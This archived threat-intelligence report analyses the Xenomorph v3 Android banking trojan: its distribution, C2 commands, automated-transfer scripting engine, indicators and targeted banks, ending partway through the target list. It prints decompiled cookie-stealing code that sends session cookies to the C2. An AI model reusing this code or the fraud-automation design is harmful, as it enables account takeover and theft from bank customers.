{
	"id": "78f2c414-9570-42e1-8e81-8ac3eb92a507",
	"created_at": "2026-04-06T00:11:44.145134Z",
	"updated_at": "2026-04-10T03:35:19.872973Z",
	"deleted_at": null,
	"sha1_hash": "d8d09d9a4c8e5166c0f2c3ec5aa0cc194590b311",
	"title": "Xenomorph v3: a new variant with ATS targeting more than 400 institutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1552461,
	"plain_text": "Xenomorph v3: a new variant with ATS targeting more than 400\r\ninstitutions\r\nPublished: 2024-10-01 · Archived: 2026-04-05 20:43:51 UTC\r\nXenomorph Introduces ATS and hundreds of new Targets\r\nIn the last year ThreatFabric saw a radical shift in the approach towards mobile malware from criminals. Criminals have\r\nstarted paying closer attention to the world of Mobile banking, abandoning more rudimental approaches in favor of a more\r\nrefined and professional philosophy.\r\nThe most evident example of this new wave of malware creators is offered by the Hadoken Security Group. We have\r\nmentioned this actor previously in our blog about BugDrop: the products developed and distributed by this group have\r\nbeen circulating for the entirety of 2022, while the actors themselves surfaced by claiming the ownership of the malware in\r\nMay.\r\nThe main product of this group is Xenomorph, a Android banking trojan discovered by ThreatFabric in February 2022.\r\nThis malware family has been a work in progress for the entirety of 2022, and despite being distributed in small\r\ncampaigns, it never truly reached the volume of other malware families on the threat landscape, such as Octo or more\r\nrecently Hook.\r\nXenomorph campaigns have always been characterized by short and contained distribution efforts, first via GymDrop,\r\na dropper operation created and managed by the same group, and later via Zombinder, another distribution vector that we\r\ncovered on a previous article in December 2022. In either case, the short bursts of activity were indicative of short test\r\nruns opposed to a real large scale distribution with fraudulent intent.\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 1 of 32\n\nHowever, things are very likely to change in the near future: ThreatFabric’s analysts have discovered a new variant of this\r\nmalware family, which we classify as Xenomorph.C.\r\nThis new version of the malware adds many new capabilities to an already feature rich Android Banker, most notably the\r\nintroduction of a very extensive runtime engine powered by Accessibility services, which is used by actors to implement\r\na complete ATS framework. With these new features, Xenomorph is now able to completely automate the whole fraud\r\nchain, from infection to funds exfiltration, making it one of the most advanced and dangerous Android Malware trojans\r\nin circulation.\r\nIn addition, the samples identified by ThreatFabric featured configurations with Target lists made of more than 400\r\nbanking and financial institutions, including several cryptocurrency wallets, with an increase of more than 6 times\r\nwith comparison to its previous variants, including financial institutions from all continents.\r\nIn addition, after discovering some samples belonging to this new variant, our researchers also discovered\r\nthe website dedicated to the advertisement of this Android banker, indicating clear intentions of entering the MaaS\r\nlandscape, and start large scale distribution.\r\nThis functionality is typical of more advanced malware families, such as Gustuff and SharkBot, which have caused\r\nthousands of euros worth of damage towards their targeted institutions.\r\nIn this article we will cover the main new features of this variant, and how these new variations can elevate Xenomorph’s\r\nthreat level.\r\nDistribution\r\nTest Samples\r\nThreatFabric was able to identify also some samples connected to test campaigns: in these cases, the samples seem to be\r\nlinked with distribution abusing third party hosting services, more specifically Discord Content Delivery Network\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 2 of 32\n\n(CDN). This is not the first time we see malware using this sort of legitimate hosting services: it not uncommon to see\r\nmalware authors use services such as Discord CDN or GitHub repositories to hide in plain sight their products.\r\nThe reasons for using this sort of service are quite straight forward: these are very common services, which are\r\nvery reliable and used by millions of people. In addition, it is free to open an account and use it to distribute malware and\r\nthere are no limitation on the number of accounts. Finally, it is very common for devices to connect to such services, so it\r\nis less likely that a security service might flag connections to these domains as suspicious.\r\nIn this specific case it is likely that these samples, which are not really part of any campaign, were simply hosted on\r\nDiscord CDN for sharing purposes, and not for distribution.\r\nZombinder Campaign\r\nThe first variants of Xenomorph were distributed by GymDrop, in February 2022. Later in the year we saw the Hadoken\r\ngroup switch distribution medium, trying out first BugDrop, and finally landing on Zombinder. In our case, Xenomorph\r\nv3 is deployed by a Zombinder app “bound” to a legitimate currency converter, which downloads as an “update” an\r\napplication posing as Google Protect:\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 3 of 32\n\nThis seems to be the method of choice with the third version of Xenomorph, abandoning previous in-house developed\r\ntechniques. Despite this, actors behind Zombinder have claimed to have stopped providing the service, indicating that\r\nthere might be once again a switch in distribution in future builds of Xenomorph.\r\nTargets\r\nXenomorph, since its first appearance, has revolved around gathering PII such as usernames and passwords\r\nusing overlay attacks.\r\nOver the course of 2022, Xenomorph has maintained a relatively stable set of targets in its configuration, with specific\r\ninterest in Spain, Portugal, and Italy, with the latest campaigns also introducing Belgian and Canadian institutions,\r\ntogether with some cryptocurrency wallets.\r\nThe first sample of this new variant analyzed by ThreatFabric continued this trend, featuring the same list of targets as the\r\nprevious versions observed. However, another sample, seemingly belonging to the same campaign, but sporting the tag\r\n“xeno3-test”, contained a much larger list of targets, counting more than 400 institutions, more than 6 times the number\r\nof targets available in the first sample.\r\nIn the case of Android Banking malware served as MaaS, it is relatively common that different campaigns of the same\r\nmalware variant will have different targets, based on the requirements of the actors managing it. In many cases, actors\r\nwho develop malware outsource the job of maintaining overlays up-to-date with the latest designs of all the different\r\nbanking application that they target. There are several actors who sell this sort of service in hacking forums.\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 4 of 32\n\nConsidering the “xeno3-test” tag, it is likely that the application belongs to a test build, which might feature the actual list\r\nof possible targets from which renters can choose from. Both lists will be available in the Appendix section of this article.\r\nCapabilities\r\nThe first variant of Xenomorph discovered in February 2022 lacked a large amount of features, such as accessibility\r\nlogging and remote actions to abuse Accessibility Services to perform fraud. It is clear that ThreatFabric detected these\r\nfirst samples while the malware was still undergoing a clear development phase.\r\nAfter a few months of inactivity since its initial discovery, a new variant of the malware was discovered by ThreatFabric\r\nresearchers in June 2022. It included a complete overhaul of the code base, increasing the modularity of the source code\r\nin order to make the malware more flexible and easier to update. This was very likely a initial test phase of Xenomorph,\r\nwhich introduced the support for remote actions thanks to the introduction of a Accessibility Services powered runtime\r\nengine, which could be used to simulate actions to impersonate the victim.\r\nWith Xenomorph.C, criminals also added the support for a complete ATS framework using this engine, which is referred\r\nto as RUM engine by the actors.\r\nHere is the list of all commands supported by Xenomorph V3, with the newly added ones in bold:\r\nCommand Description\r\napp_list Send List of installed apps\r\ninj_enable Enable injections\r\ninj_disable Disable Injections\r\ninj_list Not Implemented\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 5 of 32\n\nCommand Description\r\ninj_update Request update of injections\r\nfg_enable Enable notification in Foreground\r\nfg_disable Disable notification in Foreground\r\nnotif_ic_enable Enable Notification Intercept\r\nnotif_ic_disable Disable Notification Intercept\r\nnotif_ic_list Not Implemented\r\nnotif_ic_update Not Implemented\r\nsms_log Log SMSs\r\nsms_ic_enable Enable SMS Intercept\r\nsms_ic_disable Disable SMS Intercept\r\nsocks_start Start Socks server\r\nsocks_stop Stop Socks server\r\nsms_ic_list Not Implemented\r\nsms_ic_update Not Implemented\r\napp_kill Kill Specified Application Process\r\napp_delete Not Implemented\r\napp_clear_cache Not Implemented\r\nself_kill Not Implemented\r\nself_cleanup Removes the malware itself\r\napp_start Start Specified Application\r\nshow_push Show Push notification\r\ncookies_handler Obtain Cookies\r\nsend_sms Send SMS\r\nmake_ussd Run USSD Code\r\ncall_forward Forward Call\r\nexecute_rum Run ATS Module\r\nATS Framework\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 6 of 32\n\nAs we covered in previous articles, the term ATS (Automated Transfer Systems) is used to define a set of features that\r\nallow criminals to automatically complete fraudulent transactions on infected devices. Such systems are able\r\nto automatically extract credentials, account balance, initiate transactions, obtain MFA tokens and finalize the fund\r\ntransfers, without the need of human interaction from an operator.\r\nScripts are received in JSON format, are processed, and converted into a list of operations to be executed by the engine on\r\nthe device. Here is an example of the structure of such scripts:\r\n{\r\n  \"module\": \"\u003cMODULE_NAME\u003e\",\r\n  \"version\": 1,\r\n  \"parameters\": [...], // LIST OF PARAMETERS\r\n  \"requires\": [...], // LIST OF REQUIRED CONDITIONS\r\n  \"triggerConditions\": [...], // LIST OF TRIGGER CONDITIONS\r\n  \"terminator\": {\r\n    ...\r\n  }, // IS TERMINATOR ENABLED\r\n  \"operations\": [...] // LIST OF OPERATIONS TO BE EXECUTED (ATS)\r\n}\r\nWith the help of such systems, the malware present on an infected device can easily extract the required PIIs and use\r\nthem to perform all sorts of criminal activity.\r\nThe engine used by Xenomorph stands out from its competition thanks to the extensive selection of possible actions that\r\nare programmable and can be included in ATS scripts, in addition to a system that allows for conditional\r\nexecution and action prioritization. To illustrate the capabilities of this engine, we will take as an example a script\r\nextracted from Xenomorph’s config and used to extract MFA codes from Google’s authenticator application.\r\nBanks are slowly abandoning the use of SMS to perform Multi-Factor Authentication (MFA). As an alternative, many\r\ninstitutions seem to have opted for the use of Authenticators applications. However, such applications are often used on\r\nthe same device used to complete the transaction. A modern banking malware installed on an infected device is able to\r\ninitiate a fraudulent transaction abusing the targeted banking application, and at the same time use the authenticator app to\r\nread the required authentication codes.\r\nIn the case of Xenomorph, criminals created a ATS module for exactly this purpose: the code collection module is\r\ntriggered whenever the authenticator app is launched by the malware, using quite flexible conditional trigger conditions, as\r\nshown in the image below:\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 7 of 32\n\nThe engine provides quite a large set of customizable options, including for example logical operators. This allows\r\ncriminals to create complex conditions to take care of all possible scenarios, increasing the effectiveness of each infection.\r\nIf these conditions are satisfied, the malware will proceed and extract codes which follow a specific structure, which in the\r\ncase of authenticator codes consists in two groups made out of three digits, as shown in the following image:\r\nThis is just an example of ATS script. Here is the full list of available actions and their corresponding description:\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 8 of 32\n\nAction Code Description\r\nclickOnNode Clicks on specified node\r\ngetRootNode Get pointer to Root node\r\ngetParent Get Parent of Specified node\r\ngetFirstNeighborsRespectively Get nearest node\r\nfindAllowButton Finds button to allow action\r\ngetText Gets text of specified node\r\nclickOnParent Clicks on parent node\r\nclickOnFirstClickable Clicks on nearest clickable object\r\nclickAllowButton Clicks on allow button\r\nclickCancelButton Clicks on cancel button\r\nCONTROL_MODULE_FINISH_SUCCESSFULLY\r\nCommunicate with control module a\r\nsuccessful execution\r\nCONTROL_MODULE_ABORT\r\nCommunicate with control module a failed\r\nexecution\r\nCONTROL_GO_HOME Press HOME button\r\nCONTROL_GO_BACK Press BACK button twice\r\nCONTROL_GO_BACK5 Press BACK button 5 times\r\nCONTROL_MODULE_RETURN\r\nCommunicate with control module a\r\nfinished execution\r\nDEBUG_LOG_CONTEXT Log current context\r\nDEBUG_LOG_WHOLE_CONTEXT Log entire context\r\nDEBUG_LOG_MODULE_REGISTERED_ACTIONS Log RUM registered actions\r\nDEBUG_LOG_CURRENT_DATA Log data contained in current context\r\nDEBUG_PRINT Debug print function\r\nsetActionPassedThrough\r\nSets an existing action to be ignored by the\r\nengine\r\nfindNodesByParameters\r\nFinds nodes on UI based on search\r\nparameters\r\nfindFirstNodeByParameters\r\nFinds first node matching on UI based on\r\nsearch parameters\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 9 of 32\n\nAction Code Description\r\nfindNodesByClass Finds node based on class name\r\nfindFirstNodeByClass Finds first node based on class name\r\nfindNodesByViewId Finds node based on ViewId\r\nfindFirstNodeByViewId Finds first node based on ViewId\r\nfindFirstNodeByText Finds node based on text\r\ngetNodeByIndex Finds first node based on text\r\ngetFirstChildOfClass\r\nFinds node which is a child of specified\r\nclass\r\nCONTROL_PUT_ACTION_RESULT\r\nStore a bool indicating if the action was\r\nsuccessful\r\nsleepForMilliseconds Sleep for specified number of milliseconds\r\nCONTROL_SET_UNPROCESSED Sets if there was an unprocessed event\r\nCONTROL_CLEAR_UNPROCESSED Clears unprocessed events\r\nCONTROL_FLUSH_ALL_CONTEXT_DATA_ENTRIES Clear all node entries\r\nSTATE_EVENT_CLEAR Clear state events\r\nCONTROL_RUN_MODULE_STRAIGHT Run ATS module\r\nCONTROL_GLOBAL_VALUE_SET_FROM_TEXT_DATA_ENTRY\r\nSet Value in Shared Preferences from data\r\nentry\r\nCONTROL_GLOBAL_VALUE_SET Set Value in Shared Preferences\r\nDATA_JOIN_TUPLE_LIST Join lists of variables into tuple list\r\nAPI_SEND_SIMPLE_STATE_WITH_OBJECT Send data to C2\r\nWith this array of features and capabilities, it is quite easy to create a script to extract information such as account balance,\r\nand then perform all the necessary steps to complete a fraudulent transaction.\r\nCookie Stealer\r\nXenomorph’s latest version also added Cookie stealer capabilities to its already very extensive arsenal of weapons. After\r\nbeing introduced in the world of Android bankers by S.O.V.A. in September 2021, this feature was also added to the list of\r\nfeatures of other families such as SharkBot, and now Xenomorph.\r\nSession Cookies allow users to maintain open sessions on their browsers without having to re-input their credentials\r\nrepeatedly. A malicious actor in possession on a valid session cookie has effectively access to the victim’s logged in web\r\nsession.\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 10 of 32\n\nXenomorph, just like the other malware families previously mentioned, starts a browser with JavaScript interface\r\nenabled. The malware uses this browser to display the targeted page to the victim, with the intent of tricking users into\r\nlogging into the service whose cookie Xenomorph is trying to extract.\r\nUpon successful login, the browser will extract the cookie using the Android CookieManager and will send it to the C2\r\nserver, giving an additional way to perform account takeover (ATO) to criminals. Here is a snippet of the code used to grab\r\nthe cookie from the malware controlled browser:\r\nWebView webView0 = new WebView(this);\r\nthis.wv = webView0;\r\nwebView0.getSettings().setJavaScriptEnabled(true);\r\nthis.wv.setWebViewClient(new WebViewClient() {\r\n @Override android.webkit.WebClientView public void onPageFinished(WebView webView0, String s) {\r\n String s1 = CookieManager.getInstance().getCookie(s);\r\n String[] arr_s = CookieManager.getInstance().getCookie(s).replace(\";\", \"\").split(\" \");\r\n if (s1.contains(\"sessionid\")) {\r\n try {\r\n JSONObject jSONObject0 = new JSONObject();\r\n for (int v = 0; v \u003c arr_s.length; ++v) {\r\n String[] arr_s1 = arr_s[v].split(\"=\");\r\n jSONObject0.put(arr_s1[0], arr_s1[1]);\r\n new StringBuilder().append(\"cookie is = \").append(jSONObject0).toString();\r\n }\r\n UtilGlobal.sendCookies(jSONObject0.toString());\r\n } catch (Exception exception0) {\r\n UtilGlobal.sendCookies(\"cookiesGrabbingFailed\");\r\n new StringBuilder().append(\"Cookie Grabber Error: \").append(exception0.getMessage()).toString();\r\n }\r\n return;\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 11 of 32\n\n}\r\n }\r\n});\r\nthis.wv.addJavascriptInterface(new WebAppInterface(this), \"Android\");\r\nthis.wv.loadUrl(\"$rstr[CURD]\");\r\nthis.setContentView(this.wv);\r\nConclusions\r\nThe Xenomorph saga highlights once more that actors are switching their focus on mobile malware. The efforts of\r\nHadoken Security Group showcase how criminals are adopting more structured development cycles and programming\r\nphilosophies to create increasingly more dangerous malware families. The latest version of Xenomorph included large\r\nimprovements from its previous iteration, adding Automated Transfer System (ATS) capabilities, which elevate the\r\nthreat level of this family even more.\r\nXenomorph v3 is capable of performing the whole fraud chain, from infection, with the aid of Zombinder, to the\r\nautomated transfer using ATS, passing by PII exfiltration using Keylogging and Overlay attacks. In addition, the Threat\r\nActor behind this malware family has started actively publicizing their product, indicating a clear intention to expand the\r\nreach of this malware. ThreatFabric expects Xenomorph to increase in volume, with the likelihood of being one again\r\ndistributed via droppers on the Google Play Store.\r\nFinancial organizations are welcome to contact us: if you suspect some app be involved in malicious activity, feel free to\r\nreach our Mobile Threat Intelligence team which will provide additional details and help with reporting the malicious app\r\nif identified: mti@threatfabric.com.\r\nFraud Risk Suite\r\nThreatFabric’s Fraud Risk Suite enables safe \u0026 frictionless online customer journeys by integrating industry-leading\r\nmobile threat intel, behavioral analytics, advanced device fingerprinting and over 10.000 adaptive fraud indicators. This\r\nwill give you and your customers peace of mind in an age of ever-changing fraud.\r\nAppendix\r\nZombinder sample\r\nApp name Package name SHA-256\r\nCoinCalc com.samruston.flip 15e3c87290957590dbaf4522645e92933b8f0187007468045a5bd102c47ea0f4\r\nXenomorph V3 Samples\r\nApp\r\nname\r\nPackage name SHA-256\r\nPlay\r\nProtect\r\ncom.great.calm 9ce2ad40f3998860ca1ab21d97ea7346bf9d26ff867fc69c4d005c477c67a899\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 12 of 32\n\nApp\r\nname\r\nPackage name SHA-256\r\nPlay\r\nProtect\r\nmeritoriousness.mollah.presser 88d3cb485f405a6cec9d14e9ee2865491855897bfc9a958c0e7c06485a074d02\r\nXenomorph V3 Servers\r\nC2 Server Campaign\r\nteam[.]mi1kyway.tech test samples\r\nvldeolan[.]com live campaigns\r\ncofi[.]hk live campaigns\r\ndedeperesere[.]xyz live campaigns\r\nInjection Server Campaign\r\ninj.had0[.]live test samples\r\njobviewer[.]co live campaigns\r\nXenomorph V3 Target List\r\nLive Campaign\r\nPackageName AppName\r\napp.wizink.es WiZink, tu banco senZillo\r\nbe.argenta.bankieren Argenta Banking\r\nbe.axa.mobilebanking Mobile Banking Service\r\nbe.belfius.directmobile.android Belfius Mobile\r\nca.affinitycu.mobile Affinity Mobile\r\nca.bnc.android National Bank of Canada\r\nca.hsbc.hsbccanada HSBC Canada\r\nca.manulife.MobileGBRS Manulife Mobile\r\nca.mobile.explorer CA Mobile\r\nca.motusbank.mapp motusbank mobile banking\r\nca.pcfinancial.bank PC Financial Mobile\r\nca.servus.mbanking Servus Mobile Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 13 of 32\n\nPackageName AppName\r\nca.tangerine.clients.banking.app Tangerine Mobile Banking\r\ncgd.pt.caixadirectaparticulares Caixadirecta\r\ncom.abanca.bm.pt ABANCA - Portugal\r\ncom.atb.ATBMobile ATB Personal - Mobile Banking\r\ncom.bankinter.launcher Bankinter Móvil\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.bbva.mobile.pt BBVA Portugal\r\ncom.bnpp.easybanking Easy Banking App\r\ncom.cajasur.android Cajasur\r\ncom.cibc.android.mobi CIBC Mobile Banking®\r\ncom.coastcapitalsavings.dcu Coast Capital Savings\r\ncom.db.pbc.mibanco Mi Banco db\r\ncom.desjardins.mobile Desjardins mobile services\r\ncom.eqbank.eqbank EQ Bank Mobile Banking\r\ncom.exictos.mbanka.bic Banco BIC, SA\r\ncom.grupocajamar.wefferent Grupo Cajamar\r\ncom.imaginbank.app imaginBank - Your mobile bank\r\ncom.indra.itecban.mobile.novobanco NBapp Spain\r\ncom.indra.itecban.triodosbank.mobile.banki -\r\ncom.ing.banking ING Banking\r\ncom.kbc.mobile.android.phone.kbc KBC Mobile\r\ncom.latuabancaperandroid Intesa Sanpaolo Mobile\r\ncom.lynxspa.bancopopolare YouApp\r\ncom.mediolanum Banco Mediolanum España\r\ncom.meridian.android Meridian Mobile Banking\r\ncom.pcfinancial.mobile Simplii Financial\r\ncom.rbc.mobile.android RBC Mobile\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 14 of 32\n\nPackageName AppName\r\ncom.rsi ruralvía\r\ncom.sella.BancaSella Banca Sella\r\ncom.shaketh Shakepay: Buy Bitcoin Canada\r\ncom.targoes_prod.bad TARGOBANK - Banca a distancia\r\ncom.td TD Canada\r\ncom.tecnocom.cajalaboral Banca Móvil Laboral Kutxa\r\nes.bancosantander.apps Santander\r\nes.caixagalicia.activamovil ABANCA- Banca Móvil\r\nes.caixaontinyent.caixaontinyentapp Caixa Ontinyent\r\nes.cecabank.ealia2103appstore UniPay Unicaja\r\nes.cm.android Bankia\r\nes.evobanco.bancamovil EVO Banco móvil\r\nes.ibercaja.ibercajaapp Ibercaja\r\nes.lacaixa.mobile.android.newwapicon CaixaBank\r\nes.liberbank.cajasturapp Banca Digital Liberbank\r\nes.openbank.mobile Openbank – banca móvil\r\nes.pibank.customers Pibank\r\nes.univia.unicajamovil UnicajaMovil\r\nit.bcc.iccrea.mycartabcc myCartaBCC\r\nit.bnl.apps.banking BNL\r\nit.carige Carige Mobile\r\nit.copergmps.rt.pf.android.sp.bmps Banca MPS\r\nit.creval.bancaperta Bancaperta\r\nit.nogood.container UBI Banca\r\nit.popso.SCRIGNOapp SCRIGNOapp\r\nposteitaliane.posteapp.appbpol BancoPosta\r\nposteitaliane.posteapp.apppostepay Postepay\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 15 of 32\n\nPackageName AppName\r\npt.bancobpi.mobile.fiabilizacao BPI APP\r\npt.novobanco.nbapp NB smart app\r\npt.santandertotta.mobileparticulares Santander Particulares\r\npt.sibs.android.mbway MB WAY\r\nwit.android.bcpBankingApp.activoBank ActivoBank\r\nwit.android.bcpBankingApp.millennium Millenniumbcp\r\nwww.ingdirect.nativeframe ING España. Banca Móvil\r\nTest Samples\r\nPackageName AppName\r\nae.almasraf.mobileapp Al Masraf\r\nair.app.scb.breeze.android.main.my.prod Standard Chartered Mobile (MY)\r\nalior.bankingapp.android Usługi Bankowe\r\napp.wizink.es WiZink, tu banco senZillo\r\napp.wizink.pt Wizink, o teu banco fácil\r\nar.bapro BIP Mobile\r\nar.com.redlink.custom Banca Móvil Ciudad\r\nar.com.santander.rio.mbanking Santander Argentina\r\nar.macro Macro\r\nat.erstebank.george George Österreich\r\nat.ing.diba.client.onlinebanking ING Banking Austria\r\nat.rsg.pfp Mein ELBA-App\r\nat.volksbank.volksbankmobile Volksbank hausbanking\r\nau.com.amp.myportfolio.android My AMP\r\nau.com.bankwest.mobile Bankwest\r\nau.com.commbank.commbiz.prod CommBiz\r\nau.com.cua.mb CUA Mobile Banking\r\nau.com.hsbc.hsbcaustralia HSBC Australia\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 16 of 32\n\nPackageName AppName\r\nau.com.macquarie.banking Macquarie Mobile Banking\r\nau.com.mebank.banking ME Bank\r\nau.com.nab.mobile NAB Mobile Banking\r\nau.com.newcastlepermanent NPBS Mobile Banking\r\nau.com.rams.RAMS myRAMS\r\nau.com.suncorp.SuncorpBank Suncorp Bank\r\nau.com.suncorp.rsa.suncorpsecured Suncorp Secured\r\nau.com.ubank.internetbanking UBank Mobile Banking\r\nbe.argenta.bankieren Argenta Banking\r\nbe.axa.mobilebanking Mobile Banking Service\r\nbe.belfius.directmobile.android Belfius Mobile\r\nbr.com.intermedium Inter: conta digital completa\r\nbr.com.original.bank Banco Original\r\nbr.com.uol.ps.myaccount\r\nPagBank: Banco, Conta digital, Cartão, Pix,\r\nCDB\r\nca.affinitycu.mobile Affinity Mobile\r\nca.bnc.android National Bank of Canada\r\nca.hsbc.hsbccanada HSBC Canada\r\nca.manulife.MobileGBRS Manulife Mobile\r\nca.mobile.explorer CA Mobile\r\nca.motusbank.mapp motusbank mobile banking\r\nca.pcfinancial.bank PC Financial Mobile\r\nca.servus.mbanking Servus Mobile Banking\r\nca.tangerine.clients.banking.app Tangerine Mobile Banking\r\ncgd.pt.caixadirectaparticulares Caixadirecta\r\ncl.android Banco Falabella CMR\r\ncl.bancochile.mbanking Mi Banco de Chile\r\nco.com.bbva.mb BBVA Colombia\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 17 of 32\n\nPackageName AppName\r\nco.mona.android Crypto.com - Buy Bitcoin Now\r\ncom.CIMB.OctoPH CIMB Bank PH\r\ncom.CredemMobile Credem\r\ncom.EurobankEFG Eurobank Mobile App\r\ncom.IngDirectAndroid ING France\r\nמזרחי טפחות - ניהול חשבון nh.MizrahiTefahot.com\r\ncom.NBQBank NBQBANK\r\ncom.QIIB QIIB Mobile\r\ncom.Version1 PNB ONE\r\ncom.abanca.bancaempresas ABANCA Empresas\r\ncom.abanca.bm.pt ABANCA - Portugal\r\ncom.abnamro.nl.mobile.payments ABN AMRO Mobiel Bankieren\r\ncom.acceltree.mtc.screens Alawwal Mobile\r\ncom.aff.otpdirekt OTP SmartBank\r\ncom.akbank.android.apps.akbank_direkt Akbank\r\ncom.aktifbank.nkolay N Kolay\r\ncom.albarakaapp Albaraka Mobile Banking\r\ncom.alliance.AOPMobileApp allianceonline Mobile\r\ncom.ally.MobileBanking Ally Mobile\r\ncom.alrajhiretailapp Al Rajhi Mobile\r\ncom.ambank.ambankonline AmOnline\r\ncom.americanexpress.android.acctsvcs.us Amex\r\ncom.anadolubank.android Anadolubank Mobil\r\ncom.anz.android.gomoney ANZ Australia\r\ncom.aol.mobile.aolapp AOL - News, Mail \u0026 Video\r\ncom.arkea.android.application.cmb Crédit Mutuel de Bretagne\r\ncom.atb.ATBMobile ATB Personal - Mobile Banking\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 18 of 32\n\nPackageName AppName\r\ncom.atb.businessmobile ATB Business - Mobile Banking\r\ncom.att.myWireless myAT\u0026T\r\ncom.axabanque.fr AXA Banque France\r\ncom.bancocajasocial.geolocation Banco Caja Social Móvil\r\ncom.bancodebogota.bancamovil Banco de Bogotá\r\ncom.bancomer.mbanking BBVA México (Bancomer Móvil)\r\ncom.bancsabadell.wallet Sabadell Wallet\r\ncom.bankaustria.android.olb Bank Austria MobileBanking\r\ncom.bankia.wallet Bankia Wallet\r\ncom.bankinter.bkwallet Bankinter Wallet\r\ncom.bankinter.empresas Bankinter Empresas\r\ncom.bankinter.launcher Bankinter Móvil\r\ncom.bankinter.portugal.bmb Bankinter Portugal\r\ncom.bankofqueensland.boq BOQ Mobile\r\ncom.bawagpsk.bawagpsk BAWAG PSK klar – Mobile Banking App\r\ncom.bbt.myfi U by BB\u0026T\r\ncom.bbva.GEMA BBVA Empresas México\r\ncom.bbva.bbvacontigo BBVA Spain\r\ncom.bbva.mobile.pt BBVA Portugal\r\ncom.bbva.nxt_peru BBVA Perú\r\ncom.bcp.bank.bcp Banca Móvil BCP\r\ncom.bendigobank.mobile Bendigo Bank\r\ncom.binance.dev Binance - Buy \u0026 Sell Bitcoin Securely\r\ncom.bitpay.wallet BitPay – Secure Bitcoin Wallet\r\ncom.bmo.mobile BMO Mobile Banking\r\ncom.bnhp.payments.paymentsapp bit ביט\r\ncom.bnpp.easybanking Easy Banking App\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 19 of 32\n\nPackageName AppName\r\ncom.botw.mobilebanking Bank of the West Mobile\r\ncom.boursorama.android.clients Boursorama Banque\r\ncom.bradesco Bradesco\r\ncom.btcturk BtcTurk Bitcoin Borsası\r\ncom.btcturk.pro BtcTurk PRO - Bitcoin Al-Sat\r\ncom.caisseepargne.android.mobilebanking Banque\r\ncom.cajaingenieros.android.bancamovil Caja de Ingenieros Banca MÓVIL\r\ncom.cajasur.android Cajasur\r\ncom.cbd.mobile CBD\r\ncom.cbk.mobilebanking CBK Mobile\r\ncom.cbq.CBMobile CBQ Mobile\r\ncom.changelly.app\r\nChangelly: Buy Bitcoin BTC \u0026 Fast Crypto\r\nExchange\r\ncom.chase.sig.android Chase Mobile\r\ncom.cibc.android.mobi CIBC Mobile Banking®\r\ncom.cic_prod.bad CIC\r\ncom.cimbmalaysia CIMB Clicks Malaysia\r\ncom.citi.citimobile Citi Mobile®\r\ncom.citibanamex.banamexmobile Citibanamex Móvil\r\ncom.citibank.CitibankMY Citibank MY\r\ncom.citizensbank.androidapp Citizens Bank Mobile Banking\r\ncom.clairmail.fth Fifth Third Mobile Banking\r\ncom.cm_prod.bad Crédit Mutuel\r\ncom.coastcapitalsavings.dcu Coast Capital Savings\r\ncom.coinbase.android Coinbase – Buy \u0026 Sell Bitcoin. Crypto Wallet\r\ncom.comarch.mobile.banking.bgzbnpparibas.biznes Mobile BiznesPl@net\r\ncom.comarch.security.mobilebanking ING Business\r\ncom.commbank.netbank CommBank\r\nhttps://www.threatfabric.com/blogs/xenomorph-v3-new-variant-with-ats.html\r\nPage 20 of 32\n\nPackageName AppName\r\ncom.compasssavingsbank.mobile Compass Savings Bank\r\ncom.danskebank.mobilebank3.dk NY mobilbank DK - Danske Bank\r\ncom.db.mm.norisbank norisbank App\r\ncom.db.mobilebanking Doha Bank Mobile Banking\r\ncom.db.pbc.mibanco Mi Banco db\r\ncom.db.pwcc.dbmobile Deutsche Bank Mobile\r\ncom.denizbank.mobildeniz MobilDeniz\r\ncom.desjardins.mobile Desjardins mobile services\r\ncom.dhanlaxmi.dhansmart.mtc Dhanlaxmi Bank Mobile Banking\r\ncom.dib.app DIB MOBILE\r\ncom.discoverfinancial.mobile Discover Mobile\r\ncom.easybank.easybank easybank App\r\ncom.empik.empikapp Empik\r\ncom.empik.empikfoto Empik Foto\r\ncom.engage.pbb.pbengage2my.release PB engage MY\r\ncom.enjin.mobile.wallet\r\nEnjin: Bitcoin, Ethereum, Blockchain Crypto\r\nWallet\r\ncom.eqbank.eqbank EQ Bank Mobile Banking\r\ncom.etrade.mobilepro.activity E*TRADE: Invest. Trade. Save.\r\ncom.exictos.mbanka.bic Banco BIC, SA\r\ncom.fibabanka.Fibabanka.mobile Fibabanka Mobile\r\ncom.fibabanka.mobile Fibabanka Corporate Mobile\r\ncom.fibi.nativeapp הבינלאומי הבנק\r\ncom.finansbank.mobile.cepsube QNB Finansbank Mobile Banking\r\ncom.finanteq.finance.bgz BNP Paribas GOMobile\r\ncom.finanteq.finance.ca CA24 Mobile\r\ncom.firstbank.firstmobile 